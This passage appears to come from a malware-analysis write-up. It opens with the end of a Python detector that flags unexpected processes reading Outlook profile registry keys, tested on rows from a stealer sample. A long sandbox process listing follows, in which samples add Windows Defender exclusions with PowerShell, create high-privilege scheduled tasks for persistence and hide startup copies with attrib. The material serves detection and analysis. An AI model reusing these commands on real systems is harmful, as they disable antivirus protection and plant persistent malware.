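    """Return the signature label for an Outlook profile key, else None."""
    for label, pattern in OUTLOOK_PROFILE_KEYS:
        if pattern.search(key_path):
            return label
    return None


def parse_key_row(line):
    """Return (key_path, process_path) for one 'Key opened' row, else None."""
    m = KEY_ROW.match(line.strip())
    return (m.group(1), m.group(2)) if m else None


def find_profile_readers(lines):
    """Return [(label, process_path)] for unexpected processes opening Outlook profile keys."""
    hits = []
    for line in lines:
        parsed = parse_key_row(line)
        if not parsed:
            continue
        key_path, process = parsed
        label = classify_key(key_path)
        image = process.rsplit("\\", 1)[-1].lower()
        if label and image not in EXPECTED_READERS:
            hits.append((label, process))
    return hits


SID = "S-1-5-21-1008898722-3518013580-3694625758-1000"
STEALER = "C:\\Users\\Admin\\Desktop\\Files\\bnkrigkawd.exe"
SAMPLE_ROWS = [
    # the two rows from the report
    "Key opened \\REGISTRY\\USER\\" + SID + "\\Software\\Microsoft\\Office\\20.0\\Outlook"
    "\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676 " + STEALER + " N/A",
    "Key opened \\REGISTRY\\USER\\" + SID + "\\Software\\Microsoft\\Windows NT\\CurrentVersion"
    "\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676 "
    + STEALER + " N/A",
    # constructed benign control, hypothetical path: Outlook reading its own profile
    "Key opened \\REGISTRY\\USER\\" + SID + "\\Software\\Microsoft\\Office\\16.0\\Outlook"
    "\\Profiles\\Outlook C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE N/A",
]

if __name__ == "__main__":
    for label, process in find_profile_readers(SAMPLE_ROWS):
        print(f"{label}: {process}")
```

On the constructed input the control row is suppressed by the allow-list and both report rows are returned for bnkrigkawd.exe. The same classifier applies directly to Sysmon Event ID 12/13 TargetObject values or to registry telemetry from an EDR, where the key path and image path arrive as separate fields and parse_key_row is not needed.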

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /c

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Downloaders.zip

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Windows\explorer.exe

"C:\Windows\explorer.exe" shell:::{52205fd8-5dfb-447d-801a-d0b52f2e83e1}

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1904 -prefMapHandle 1896 -prefsLen 27351 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4251183b-c529-41a7-8d91-8e53ac557d75} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2392 -parentBuildID 20240401114208 -prefsHandle 2376 -prefMapHandle 2372 -prefsLen 27229 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9cc0e51e-95aa-4547-9b13-6ad1322d4b08} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3264 -childID 1 -isForBrowser -prefsHandle 2980 -prefMapHandle 2848 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {75d88463-c8cc-4742-837f-cf01e8033871} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3844 -childID 2 -isForBrowser -prefsHandle 3836 -prefMapHandle 3832 -prefsLen 32603 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9130ac1f-16ad-4cb5-9017-be9c7f3016be} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4680 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4672 -prefMapHandle 4676 -prefsLen 32603 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f93c553-1a5b-4df9-99f5-1047f643c37a} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5332 -childID 3 -isForBrowser -prefsHandle 5324 -prefMapHandle 4688 -prefsLen 26928 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {06250da0-bfc0-4206-8418-b7c9fe76ac6e} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5476 -childID 4 -isForBrowser -prefsHandle 5484 -prefMapHandle 5488 -prefsLen 26928 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {94944873-ef8d-4978-bc1f-b97a2617367b} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5668 -childID 5 -isForBrowser -prefsHandle 5676 -prefMapHandle 5680 -prefsLen 26928 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da95f5f0-4211-41c8-bc9c-919e72244a0a} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping 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-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjEiIGluc3RhbGxkYXRldGltZT0iMTczOTI5NDgzNCIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNzY2NTUyNTM3MDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUzMTEyNzI0MjAiLz48L2FwcD48L3JlcXVlc3Q-

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3256 -childID 6 -isForBrowser -prefsHandle 3456 -prefMapHandle 2840 -prefsLen 27114 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f433fd1-071a-4ba0-8e0e-b7fa991ec34e} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5448 -childID 7 -isForBrowser -prefsHandle 5424 -prefMapHandle 5440 -prefsLen 27114 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ebd8e86f-5ca9-4f13-9c64-e4be28907c4b} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2964 -childID 8 -isForBrowser -prefsHandle 6428 -prefMapHandle 2956 -prefsLen 33998 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4679e6b9-9569-4719-aad4-d727965235fc} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6440 -childID 9 -isForBrowser -prefsHandle 1640 -prefMapHandle 6620 -prefsLen 27941 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a408787-ffd7-4646-a7b9-2b98af782eb8} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6680 -childID 10 -isForBrowser -prefsHandle 6892 -prefMapHandle 6888 -prefsLen 27941 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b774784c-8211-47dc-90c4-10b9449fb05a} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\MicrosoftEdge_X64_133.0.3065.59.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff785436a68,0x7ff785436a74,0x7ff785436a80

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff785436a68,0x7ff785436a74,0x7ff785436a80

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --register-package-identity --verbose-logging --system-level

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --remove-deprecated-packages --verbose-logging --system-level

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6acd96a68,0x7ff6acd96a74,0x7ff6acd96a80

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --update-game-assist-package --verbose-logging --system-level

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6acd96a68,0x7ff6acd96a74,0x7ff6acd96a80

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6acd96a68,0x7ff6acd96a74,0x7ff6acd96a80

C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe

"C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe"

C:\Program Files\ProcessMonitor\Procmon64.exe

"C:\Program Files\ProcessMonitor\Procmon64.exe"

C:\Program Files\ProcessMonitor\Procmon.exe

"C:\Program Files\ProcessMonitor\Procmon.exe"

C:\Users\Admin\AppData\Local\Temp\Procmon64.exe

"C:\Users\Admin\AppData\Local\Temp\Procmon64.exe" /originalpath "C:\Program Files\ProcessMonitor\Procmon.exe"

C:\Program Files\sysint\Procmon64.exe

"C:\Program Files\sysint\Procmon64.exe"

C:\Users\Admin\Desktop\4363463463464363463463463.exe

"C:\Users\Admin\Desktop\4363463463464363463463463.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\4363463463464363463463463.exe

"C:\Users\Admin\Desktop\4363463463464363463463463.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\Files\Fast%20Download.exe

"C:\Users\Admin\Desktop\Files\Fast%20Download.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"

C:\Users\Admin\Desktop\Files\XClient.exe

"C:\Users\Admin\Desktop\Files\XClient.exe"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Users\Admin\Desktop\Files\built.exe

"C:\Users\Admin\Desktop\Files\built.exe"

C:\Users\Admin\Desktop\Files\key.exe

"C:\Users\Admin\Desktop\Files\key.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 400

C:\Users\Admin\Desktop\Files\contorax.exe

"C:\Users\Admin\Desktop\Files\contorax.exe"

C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe

"C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\built.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\T4gy0CnbOZcl.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2wVHvYK17sCW.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\Sentil.exe

"C:\Users\Admin\Desktop\Files\Sentil.exe"

C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe

"C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe"

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe" /rl HIGHEST /f

C:\Users\Admin\Desktop\Files\Security.exe

"C:\Users\Admin\Desktop\Files\Security.exe"

C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe" /rl HIGHEST /f

C:\Users\Admin\Desktop\Files\Client-built.exe

"C:\Users\Admin\Desktop\Files\Client-built.exe"

C:\Users\Admin\AppData\Local\Temp\$77Security.exe

"C:\Users\Admin\AppData\Local\Temp\$77Security.exe"

C:\Users\Admin\AppData\Local\Temp\Install.exe

"C:\Users\Admin\AppData\Local\Temp\Install.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

